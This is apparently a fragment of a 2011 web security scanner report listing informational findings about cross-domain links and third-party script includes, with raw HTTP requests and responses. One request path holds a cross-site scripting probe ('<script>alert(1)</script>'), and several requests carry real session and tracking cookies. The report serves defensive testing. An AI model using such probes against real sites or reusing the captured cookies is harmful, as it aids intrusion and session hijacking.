<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/infcjC4-YVh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/eiDkkYU8S2N.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/4aagnIgAmID.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ioAu8seq_Ap.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274170_100000159617387_7658664_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DKann07" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276052_100001228646435_1558348591_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174518_1531397409_2783989_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275054_1053268063_4076276_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002628863314" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274595_100002628863314_3338433_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...
11.57. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:41:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 108318

<!doctype html> <head> <title>ciphertext data security - Google Search</title> <script>window.google={kEI:"7P1tTsXEJJTUiAKK9tTSCQ",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=ciphertext+data+security&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/ff650720.aspx" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEIQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Sji6FIwwlxIJ:msdn.microsoft.com/en-us/library/ff650720.aspx+ciphertext+data+security&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Cipher" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQFjAB')">Cipher - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:oemRhzQ2UAYJ:en.wikipedia.org/wiki/Cipher+ciphertext+data+security&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CEsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Ciphertext_stealing" class=l onmousedown="return clk(this,this.href,'','','','3','','0CFAQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fulsrvTK4hIJ:en.wikipedia.org/wiki/Ciphertext_stealing+ciphertext+data+security&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CFIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.naun.org/journals/communications/c-21.pdf" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFkQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://searchsecurity.techtarget.com/definition/ciphertext-feedback" class=l onmousedown="return clk(this,this.href,'','','','5','','0CGIQFjAE')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:zQXddN3z37oJ:searchsecurity.techtarget.com/definition/ciphertext-feedback+ciphertext+data+security&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CGQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://publib.boulder.ibm.com/infocenter/dsichelp/ds8000ic/topic/com.ibm.storage.ssic.help.doc/f2c_encryption_concepts_3ekm4r.html" class=l onmousedown="return clk(this,this.href,'','','','6','','0CGgQFjAF')">Encryption concepts</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_ppv8Eu5Z0EJ:publib.boulder.ibm.com/infocenter/dsichelp/ds8000ic/topic/com.ibm.storage.ssic.help.doc/f2c_encryption_concepts_3ekm4r.html+ciphertext+data+security&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CGoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.webopedia.com/TERM/C/cipher_text.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CG8QFjAG')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Aspm2TbMkFIJ:www.webopedia.com/TERM/C/cipher_text.html+ciphertext+data+security&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CHEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=4784733" class=l onmousedown="return clk(this,this.href,'','','','8','','0CHYQFjAH')">Self-Encryption Scheme for <em>
...[SNIP]...
<h3 class="r"><a href="http://www.omnisecu.com/security/public-key-infrastructure/what-is-symmetric-encryption.htm" class=l onmousedown="return clk(this,this.href,'','','','9','','0CIEBEBYwCA')">What is Symmetric Encryption?</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:j9o4Xdm5kfYJ:www.omnisecu.com/security/public-key-infrastructure/what-is-symmetric-encryption.htm+ciphertext+data+security&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CIYBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cs.umd.edu/~jkatz/papers/cca-multiple.ps" class=l onmousedown="return clk(this,this.href,'','','','10','','0CIoBEBYwCQ')">Chosen-<em>
...[SNIP]...
</span> Adobe PostScript - <a href="http://webcache.googleusercontent.com/search?q=cache:0ggui1rkxhwJ:www.cs.umd.edu/~jkatz/papers/cca-multiple.ps+ciphertext+data+security&cd=10&hl=en&ct=clnk&gl=us" class=fl onmousedown="return clk(this,this.href,'','','','10','','0CI8BECEwCQ')">View as HTML</a>
...[SNIP]...
11.58. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CEQQFjAA&url=http%3A%2F%2Fwww.ciphertex.com%2F&ei=8v1tTt-yHsfZiAKlyvW-Dg&usg=AFQjCNFy8eMoe0HZpui9iurbD13vX4OCsg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security#hl=en&sa=X&ei=7P1tTsXEJJTUiAKK9tTSCQ&ved=0CD4QBSgA&q=ciphertex+data+security&spell=1&bav=on.2,or.r_gc.r_pw.&fp=ad22561d38e22c32&biw=1155&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh

Response

HTTP/1.1 302 Found
Location: http://www.ciphertex.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:41:32 GMT
Server: gws
Content-Length: 222
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.ciphertex.com/">here</A>
...[SNIP]...
11.59. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832630%7C5CKyG59MaJD7bSL%2BWHYWGqeAyMWC71WkfTqG%2FgrlKsXzqjYH8JcN%2BVHCKe1sQLdwNRmlR66qd%2BN6nGNdxVd%2BTEYtwVmgVvDNddwciSAOcL%2FsjPvmppJcUaHyoyNVEQt4%2F2BBcC6BoZQb9K%2F6t979ZN1XHdoJkpX2z8GxZjTEJ6rnzryCKtBnna0nrKS08GlTS6M0J3weSHeuZzKDMs35tw%3D%3D%7C1a48544dabced6305ba059d446818611fec5a1dc; expires=Wed, 05-Oct-2011 16:37:10 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:50 GMT
Server: lighttpd/1.4.26
Content-Length: 7845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-36POJYHTosuxU" target="_blank"><img src="//secure.quantserve.com/pixel/p-36POJYHTosuxU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><img class="statcounter" src="http://c.statcounter.com/3927460/0/d7055de4/1/" alt="" /></div>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
12. Cross-domain script include  previous  next
There are 28 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

12.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://67.23.1.124
Path:   /omni/cdcc_mandelbrot_min_2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /omni/cdcc_mandelbrot_min_2.html HTTP/1.1
Host: 67.23.1.124
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:36 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 29 Jun 2011 17:40:08 GMT
ETag: "500dcb-1d0-4a6dd4685ce00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 464
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mandelbrot Cross-Dom
...[SNIP]...
<body>
<script src="//cdn.link-smart.com/linksmart_receiver_2.0.0.min.js" type="text/javascript">
</script>
...[SNIP]...
12.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;pos=3;tile=3;sz=300x250;ord=4942? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4212
Date: Mon, 12 Sep 2011 12:48:16 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...
12.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=6895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4207
Date: Mon, 12 Sep 2011 12:48:15 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
12.4. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!